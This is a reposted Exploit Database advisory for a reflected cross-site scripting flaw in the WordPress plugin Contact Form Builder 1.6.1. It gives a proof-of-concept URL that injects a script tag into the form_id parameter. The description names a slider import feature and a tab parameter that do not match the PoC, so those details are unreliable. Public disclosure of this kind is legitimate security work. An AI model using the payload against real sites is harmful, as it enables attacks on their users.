WordPress Plugin Contact Form Builder 1.6.1 – Cross-Site Scripting (XSS)

• Exploit Database
• 21 阅读

• 作者： Milad karimi
  日期： 2022-02-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50734/

• # Exploit Title: WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
  # Date: 2022-02-07
  # Author: Milad karimi
  # Software Link: https://wordpress.org/plugins/contact-forms-builder/
  # Version: 1.6.1
  # Tested on: Windows 11
  # CVE: N/A
  
  1. Description:
  This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
  
  2. Proof of Concept:
  http://localhost/code_generator.php?form_id=<script>alert('xss')</script>